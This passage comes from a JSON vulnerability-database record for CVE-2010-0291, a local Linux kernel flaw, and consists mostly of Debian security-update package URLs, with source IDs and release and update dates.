        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0306"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42896"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0291"
      },
      {
        "db": "BID",
        "id": "37906"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "db": "PACKETSTORM",
        "id": "85423"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-42896"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0291"
      },
      {
        "db": "BID",
        "id": "37906"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "db": "PACKETSTORM",
        "id": "85423"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-02-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42896"
      },
      {
        "date": "2010-02-15T00:00:00",
        "db": "VULMON",
        "id": "CVE-2010-0291"
      },
      {
        "date": "2010-01-19T00:00:00",
        "db": "BID",
        "id": "37906"
      },
      {
        "date": "2010-07-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "date": "2011-02-11T13:13:00",
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "date": "2010-03-01T21:20:35",
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "date": "2010-02-05T16:17:54",
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "date": "2010-11-16T18:01:26",
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "date": "2010-01-20T14:46:34",
        "db": "PACKETSTORM",
        "id": "85423"
      },
      {
        "date": "2010-02-15T20:31:13",
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "date": "2010-01-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      },
      {
        "date": "2010-02-15T18:30:00.720000",
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42896"
      },
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2010-0291"
      },
      {
        "date": "2015-03-19T08:08:00",
        "db": "BID",
        "id": "37906"
      },
      {
        "date": "2011-03-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "date": "2023-02-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      },
      {
        "date": "2023-02-13T02:21:05.070000",
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "37906"
      },
      {
        "db": "PACKETSTORM",
        "id": "85423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Vulnerability gained in",
    "sources": [
      {
